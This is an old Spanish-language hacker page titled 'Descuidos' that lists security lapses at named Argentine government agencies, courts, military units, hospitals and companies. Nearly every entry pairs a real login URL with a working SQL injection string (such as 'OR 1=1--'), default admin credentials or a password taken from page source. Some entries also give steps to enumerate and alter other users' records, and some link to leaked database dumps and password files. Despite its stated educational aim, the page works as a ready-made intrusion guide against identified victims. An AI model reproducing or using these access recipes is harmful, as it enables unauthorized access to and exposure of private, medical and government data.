"Entraste? parece que conoces los principios basicos de la seguridad informatica, de los descuidos, las fallas humanas, y que el 90% de las intrusiones se dan por lo que está entre las silla y el teclado" (by L!)


. :: Descuidos ::.

Mantenido por : Syn : syn@elportal.info

A continuacion se detallan descuidos de distintas empresas. Todos han sido sacados por medio de la mente y no de programas ya creado que buscan vulnerabilidades. A muchas de estas paginas se les ha avisado de sus errores y muchas como veran, los han corregido. Este apartado no pretende ser una base de datos para que la gente entre a "hackear" las webs, al contrario. Si les tienta la curiosidad van a entrar a ver y por ende si hay alguien responsable en la entidad del otro lado, se podra percatar que mucha gente esta entrando a lugares que no corresponden. Creo que eso demuestra que tan responsables y que tan dedicados estan.
No publicaremos las respuestas ni screenshot de las paginas comentadas aqui debajo, justamente porque esto no es una burla sino que es un ejemplo para aprender. ¿O acaso a mi me importa que hace por ejemplo Parmalat de su vida?.

        Última actualización: 17/09/2005

Descuido Bug/Exploit
#Parmalat

http://www.parmalat.com.ar/names.nsf

http://www.parmalat.com.ar/log.nsf

http://www.parmalat.com.ar/catalog.nsf

http://www.parmalat.com.ar/admin4.nsf

#La Pampa

http://mail.lapampa.gov.ar/admin4.nsf

http://mail.lapampa.gov.ar/names.nsf

#Liberty

http://www.libertyargentina.com.ar/names.nsf

http://www.libertyseguros.com.ar/names.nsf

#San Martín de los Andes

http://digesto.smandes.gov.ar/admin4.nsf

http://digesto.smandes.gov.ar/log.nsf

http://digesto.smandes.gov.ar/catalog.nsf

http://digesto.smandes.gov.ar/names.nsf

#Ministerio de Cultura y Eduación

http://www.profor.mcye.gov.ar/admin4.nsf

http://www.profor.mcye.gov.ar/catalog.nsf

http://www.profor.mcye.gov.ar/names.nsf

http://www.ls.mcye.gov.ar/admin4.nsf

http://www.ls.mcye.gov.ar/log.nsf

http://www.ls.mcye.gov.ar/catalog.nsf

http://www.ls.mcye.gov.ar/names.nsf

http://www.ucn.mcye.gov.ar/names.nsf

http://www.ucn.mcye.gov.ar/admin4.nsf

IP router: 170.155.20.5 | Posee Usuario y Clave débiles.

#Osteored http://www.osteored.com.ar/stcenter.nsf
#ISEV

http://www.isev.com.ar/

Para acceder al Sector Premium:

Usuario: ' OR ''=' | Clave: ' OR ''='

#Agencia Foia

http://www.agenciafoia.com.ar/login2.asp

Para acceder a la Intranet:

Usuario: ' OR ''=' | Clave: ' OR ''='

#Fuerzas Armadas

http://www.faa.mil.ar/?PageServices

http://www.faa.mil.ar/?pageservices

#Conexia

http://www.conexia.com.ar/

Usuario: admin | Clave: admin

#Azira

http://www.adepa.com.ar/metaPortal/LogIn/

Acceso a Extranet:

Usuario: admin | Clave: admin

#Impsat

Clave default para la mayoría de los routers de sus rangos. La estructura de la clave es X-Y.

Por razones evidentes no se dará a conocer la clave. Busquen en sus rangos routers vulnerables con clave X-Y

#Hospital Italiano

Ingresar a la Sección Paciente Virtual sin poseer usuario y clave.

http://www.hospitalitaliano.org.ar/intranet/formularios/paciente_virtual/index.php

 

#Responsables Informáticos de la Administración  Pública Nacional

http://rrii.sgp.gov.ar

Según se puede ver , sólo los usuarios autorizados pueden tener acceso a los documentos. Y no tenemos forma de registrarnos.

Acceder a sus documentos.

http://rrii.sgp.gov.ar/intranet/Documents/

También podemos acceder con el usuario : con privilegio de "anónimo" . Es decir, sólo tendremos acceso a ciertos documentos.

Hoy 11/11/04 el problema anterior fue solventado pero :

http://rrii.sgp.gov.ar/intranet73/

Usuario: admin | Clave: admin

Copia de Seguridad BD:  http://descuidos.elportal.info/intranet73-20041210.231234.sql.gz

#Organización Panalimentos

http://www.panalimentos.org/intranet/

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--  

Una vez dentro , nos loguearemos de la mismo forma en la sección "Gerencia Remota", teniendo acceso a los diferentes usuarios.

Ya con los nombres de usuario podremos volver a la página de logueo de la intranet. Y usar : 

Usuario: nombreUsuario'-- | Clave: 'OR 1=1--

Y nos loguearemos con el usuario elegido.

Entrar en menú administración:

http://www.panalimentos.org/search/esp/scripts/LoginAdmin.asp

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#El Sitio

Log del Bash History.

http://descuidos.elportal.info/bash_history.log

#Conae

http://conae-gate6.conae.gov.ar

Es curioso porque tanto Netcraft como Google , nos permiten conocer la dirección http del router. Por lógica no debería ser así.

Luego resta aplicar un bug de los routers cisco. La explicación del bug y cómo explotarlo lo encontrarán en:

http://www.securityfocus.com/infocus/1734

#Universidad La Rioja

http://www.unlar.net/wwwroot/sigea/
#Ministerio de Economía

http://descuidos.elportal.info/mecon.zip

Los diferentes archivos contenidos en el zip fueron encontrandos utilizando el propio buscador de la página.

#Poder Judicial de la Ciudad Autónoma de Buenos Aires

http://iis.jusbaires.gov.ar/

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Poder Judicial de la Provincia de Buenos Aires

Lista de Subdominios afectados: http://www.scba.gov.ar/Mesa/mesa.htm

Luego , una vez ya en el subdominio :

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

Ejemplo:

Elijo el subdominio de Olavarría:  http://www.ol.pjba.gov.ar/mev/

Me logueo con el Usuario y Clave anterior.

Ingreso a Modificar mis Datos.

Ver el URL: http://www.ol.pjba.gov.ar/mev/registracion.asp?IdUsuario=1&pagina=%2Fmev%2Fseleccion%2Easp

Luego vamos cambiando el IdUsuario y tendremos acceso a los Datos de los Usuarios registrados en el Sistema.

También podremos borrar a los usuarios, pero no sería muy ético de nuestra parte.

#Superintendencia de Seguros de la Nación

https://iris.ssn.gov.ar/

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Registro Nacional de Armas

Según lo indicado en la página :

"Cuando se envía datos a través de Internet existe la posibilidad que otros puedan verlos. Para evitar dicha situación, el ReNAr ha creado un canal seguro de comunicación entre Ud. y nosotros encriptando dichos datos por medio de certificados digitales."

Pero :

http://www.renar.gov.ar/_private/form_results.txt

#Ministerio de Salud

http://www.ms.gba.gov.ar/HERG/login.html

Usuario: Prueba | Clave: Prueba

#Comisión Investigaciones Científicas

http://www.cic.gba.gov.ar/sistemas/

Usuario: admin | Clave: admin

http://www.cic.gba.gov.ar/sistemas/invest/

#Gobierno Provincia Buenos Aires

https://sistemas.gba.gov.ar/login.php

Usuario: consulta | Clave: consulta

#Sistema de Diagnóstico del Capital Humano

http://www.sidcap.fundemp.org.ar/index.html

Usuario: sidcap'-- | Clave: 'OR 1=1--

#Registro de Importaciones para Insumos destinados a Investigaciones Científico-Tecnológicas

http://www.roecyt.secyt.gov.ar/php/login.php

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

El sitio nos dice:  "Recuerde imprimir esta página y agregarla a la documentación complementaria que deberá remitir a ROECyT"

Con lo cual podemos ver la importancia de dicho descuido.

#Dirección General de Bienestar - Ejército Argentino

Links a las promociones: http://www.bienejer.mil.ar/promos/listaprom.asp

En c/u de ellas van a pedir que ingresemos el Apellido - DNI - Contraseña.

Ejemplo:

http://www.bienejer.mil.ar/promos/passw.asp?prom=095

Apellido: ' OR ' ' = ' | DNI: 0 | Clave: ' OR ' ' = '

Y estaríamos logueados.

A la derecha podemos ver un formulario de ingreso a la sección "Privado DGB"

Lo que permite esta sección es administrar la página y según dice su utilización "está restringida al administrador de las promociones".

En dicha sección nos loguearemos con el Usuario y Clave anterior: ' OR ' ' = '

Se nos activará un link de "Administración" cone el cual podremos editar el sector de mensajes y novedades.

#Estudio Mazars

http://estudio.mazars.com.ar/auditoria/

Acceso al Sistema de Control: 

Usuario: ' OR ' ' = ' | Clave: ' OR ' ' = '

#Comisión Nacional de Regularización de Transporte

http://www.cnrt.gov.ar/pm/indexpm.html

Según lo indicado en la página:

"La Extranet de la CNRT no es de dominio público. Solo pueden acceder a ella el personal autorizado y los organismos vinculados a su operatoria"

Pero: 

Usuario: ' OR ' ' = ' | Clave: ' OR ' ' = '

#Provincia Salud / Hospital Francés

https://intranet.psalud.com.ar

Según se indica en la página:

"Prohibido el acceso a personal ajeno a Provincia Salud / Hospital Francés. Su usuario y password es intransferible, por favor no los revele a otras personas."

Pero:

Usuario: admin | Clave: admin

#CajaDePagos

http://www.cajadepagos.com

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

Para obtener usuarios válidos : http://www.cajadepagos.com/nuestrosclientes.asp

Y luego nos podremos loguear con cualquier de ellos de la siguiente forma:

Usuario: nombreUsuario'-- | Clave: 'OR 1=1--

Ejemplo: Usuario: icatel'-- | Clave: 'OR 1=1--

#Nosis

http://www.nosis.com.ar

Intranet de Atención al Cliente : http://atclientes.nosis.com.ar

Usuario: ' OR ''=' | Clave: ' OR ''=' 

Administrador OCI : http://adminoci.nosis.com.ar/

#SES NET

http://www.sesnet.com.ar

Ingreso a la Gestion WEB:

Usuario: ' OR ''=' | Clave: ' OR ''=' 

#Marticorba

Colegio y Caja de martilleros y corredores Públicos de la prov de Bs As: http://www.marticorba.org.ar

Acceso del afiliado: http://www.marticorba.org.ar/login.asp

Número de afiliado: número (Puede ir desde el 1 hasta el 28829) | Clave: ' OR ''='

Colegio con acceso a las consultas personalizadas: http://www.marticorba.org.ar/logincolegio.asp

Colegio: identificación (lo sacamos de la ficha del afiliado) | Clave: ' OR ''='

#Colegio de Escribanos de la Ciudad de Bs As

http://www.colegio-escribanos.org.ar/

Acceso a la sección "Area restringida" : http://www.colegio-escribanos.org.ar/restringida.asp

Usuario: 'or 1=1-- | Clave: 'or 1=1--

#FEMAPE Federacion de empresas mayoristas y proveedores del estado de la prov de Bs As: www.femape.org.ar

Acceso a Licitaciones: http://www.femape.org.ar/v3/licitaciones/licitaciones.asp

Acceso a proveedores integrantes: http://www.femape.org.ar/v3/assii/asii_integrantes.asp

Acceso a Clínicas / Hospitales / Entidades: http://www.femape.org.ar/v3/assii/asii_clinicas.asp

Usuario: ' OR ''=' | Clave: ' OR ''='

#Aria Giovanni Nude Gracias al amigo n3tar podrán deleitarse siendo miembros de :

www.ariagiovanninude.com/join-aria-giovanni-nude.html

User: 'OR 1=1-- | Clave: 'OR 1=1--

Que lo disfruten :)

#Ministerio de Seguridad http://www.mseg.gba.gov.ar/Linea911/modulosformacionbasica.htm

Si observamos el código fuente:

if (form.password.value != "sistema911")
alert (" Clave incorrecta ");

Por lo q está mas q claro q la clave es sistema911.

También podremos escalar directorios:

http://www.mseg.gba.gov.ar/Linea911/

Si bien este descuido no se destaca por la relevancia del contenido, es un claro ejemplo de la realidad de algunas páginas gubernamentales.

#Procuración general Suprema Corte Justicia de la provincia de Buenos Aires http://www.procuraciongral.com.ar/acceso.html

"El ingreso a esta sección es exclusiva para Instructores del Departamento de Policía Judicial"

Nuevamente volvamos a mirar el código fuente :)

if (form.id.value=="instructores") 
if (form.pass.value=="secpoljud")

A esta altura, ya nada sorprende.

#IFX Networks IFX Networks es un ISP de gran jerarquía.

Sin embargo presenta ciertos defectos en lo relativo a la seguridad.

Por empezar la lista de sus routers/switches con su nombre, IP y fabricante.

http://nms1.ifxnetworks.com/

Y por último:

http://nms2.ifxnetworks.com

Usuario: admin | Clave: admin

Tendremos acceso a JFFNMS a nivel de administrador. Info en http://www.jffnms.org/

#Amchamar http://www.amchamar.com.ar/seguridad/ingreso.asp

http://www.amchamar.com.ar/seguridad/passwordfile.txt

#Limansky Acceso a la Intranet: http://64.76.47.162/logon.asp

Observamos el código fuente:

function Entrar(h6537df) {window.location=h6537df+".htm"}

Clave: h6537df

#Asyste Argentina http://200.68.117.73/inicio.asp

Usuario: admin | Clave: admin

#Mymtec http://sistemas.mymtec.com.ar/

Clave: 'or 1=1--

#Obra social para la actividad docente http://200.69.253.49

Usuario: ' OR ''=' | Clave: ' OR ''='

#OSNET http://www.osnet.com.ar/osnet/IngresoEmp.asp

Usuario: ' OR ''=' | Clave: ' OR ''='

#Legislatura Ciudad de Buenos Aires Direccion general de sistemas : http://reclamos.legislatura.gov.ar

Acceso a Inventario: http://reclamos.legislatura.gov.ar/~espark/new_inventario/inicio.php

Archivos interesantes: http://reclamos.legislatura.gov.ar/~espark/

#BGH http://200.49.210.124

Manuales para celulares Motorola y soft:

Usuario: ' OR ''=' | Clave: ' OR ''='

Luego en el menu superior observamos la direccion de mail q figura en "Contactenos" y nos logueamos con dicho usuario. De esa forma tendremos acceso a la administracion:

Usuario: arrieta | Clave: ' OR ''='

#Julio Aurelio SA http://24.232.97.129/

Usuario: ' OR ''=' | Clave: ' OR ''='

#Comision Federal de Impuestos Sector de acceso reservado para Representantes y Usuarios Registrados: www.cfi.gov.ar/menup.html

Usuario: prueba | Clave: prueba

#Elexias http://www.elexias.com.ar/profesionales/archivos/login2.asp

Usuario: admin | Clave: 'OR 1=1--

Como veremos la clave aparece con ****

Nos bajamos un plugin para el Firefox : http://www.contrex-us.com/gecko/unhidepw.xpi

Que permite visualizar el texto en lugar de los *****

Volvemos a loguearnos con Usuario: admin | Clave: 'OR 1=1 --

Ahora la clave la veremos en texto plano, por lo q resta loguearse con la clave correspondiente.

Y asi visualizar los usuarios y sus respectivas claves para acceder a los diferentes servicios.

#EGobierno http://www.egobierno.gov.ar/municipios/index.asp

Usuario: admin | Clave: admin

#Red Apícola Latinoamericana

http://www.apinetla.com.ar/login.php

Usuario: admin | Clave: admin

#Harteneck - Quian & Asociados http://www.harteneck-quian.com/intranet.html

El sistema de login para los diferentes servicios está realizado en Flash.

Por ende obtendremos las claves mirando el código fuente de los swf.

Solamente completar el campo de password para ingresar.

#Colegio de Bioquímicos de Entre Ríos http://www.cober.com.ar/administrador/control.htm

Acceso al panel de control sin protección de clave.

#Epi-ETA http://www.epi-eta.org/intranet/Default.asp

Usuario:'OR 1=1--  | Clave:'OR 1=1--

#Bigua Rugby Club http://www.ucip.org.ar/bi/admin.asp

Usuario: ' OR ' ' = ' |  Clave: ' OR ' ' = '

La página anteriormente estuvo "hackeada"

#SINAVIMO http://www.sinavimo.gov.ar/cgi-bin/yabb/YaBB.pl?board=;action=login

Acceso al foro como administrador: Usuario: admin | Clave admin

#Fundacion de Investigaciones Economicas Latinoamericanas http://24.232.76.6/datafiel/Login.asp

Usuario: 'or 1=1-- | Clave: 'or 1=1--

#Sociedad de Estiba y Desestiba del puerto de la Bahia de Cadiz  Acceso a empresas:  http://www.estigades.es/comun/empresas/login.asp?lengua=2

Usuario: 'or 1=1-- | Clave: 'or 1=1--

#Aycon Consultores SA  http://www.aycon.cl/sipar/login.asp

Usuario: 'or 1=1-- | Clave: 'or 1=1--

#Asesores de Córdoba SA http://www.asecor.com.ar/asp/login.asp

Usuario: 'or 1=1-- | Sucursal: 0 | Clave: 'or 1=1--

#SERNAL SA http://www.sernal.es/ConsultaProductos/Login.asp

Usuario: 'or 1=1-- | Clave: 'or 1=1--

#Ministerio del Interior https://intranet.mininterior.gov.ar/default.asp

Tramix (consulta de viejos expedientes) -  Usuario: tramix | Clave: tramix

Compromisos y viajes  -  Usuario: administrador | Clave: admin

Digitalización de Actos Administrativos: Despacho - Usuario: administrador | Clave: despacho

Digitalización de Actos Administrativos: Biblioteca - Usuario: administrador | Clave: admin

Subsidios - Usuario: administrador | Clave: 123

#CTI http://ctidirecto.cti.com.ar/gws/

Los archivos .log contienen los números de celulares con sus respectivas contraseñas para loguearse en : http://ctidirecto.cti.com.ar/gws/PTTProvServlet?Action=Generate&Xsl=index.xsl

Una vez dentro podremos modificar la lista de contactos del usuario y demás.

#Equalizer Systems http://equalizersystems.com/tech/Admin-Login.asp

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Los Andes http://www.losandes.com.ar/AdManager/admin/login.asp

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Zetnia http://cms.zetnia.com.ar/admin/login/index.cfm

Usuario: admin | Clave: admin

#Amaira http://200.49.155.182

Usuario: ' OR ''=' | Clave: ' OR ''='

Potente motor de búsqueda (inmobiliarias)

#Clarín http://www.informatica.clarin.com/diario/grilla/base

Linda base de datos....

#Hotel Los Leones http://www.losleones.info/admin.asp

Usuario: admin | Clave: admin

#European Pellet Centre http://www.pelletcentre.info/database/admin.asp

Usuario: ' OR ''=' | Clave: ' OR ''='

#Consejo Profesional de Agrimensura http://www.cpa.org.ar/validaruser.php

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Estudio Morea & Asociados http://www.emorea.com.ar/restringido.asp

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Secretaría General de la Gobernación http://www.dc.dpiyc.sg.gba.gov.ar/

Usuario: admin | Clave: webport

#Sistemas Provinciales  http://dpdserver.dpi.sg.gba.gov.ar/login.php

Usuario: consulta | Clave: consulta

Esto ya se había informado pero para otro servidor: https://sistemas.gba.gov.ar/login.php

Ese servidor fue subsanado, pero al parecer éste no... son los mismos sistemas.

Lo interesante: consulta de sueldos, entre otros.

#Gobierno Tucumán http://www.tucuman.gov.ar/gobierno/compras/login.asp

CUIL: 0 | Clave: 'OR 1=1--

#Gobierno La Rioja http://dgip.larioja.gov.ar/contribuyentes/login.asp

Usuario: 'OR 1=1-- | Clave: 'OR 1=1--

#Centro Unificado https://www.centrounificadoinfo.com.ar/index.aspx

Cámara de distribuidores autorizados de formularios emitidos por el Estado.

Usuario: test | Clave: test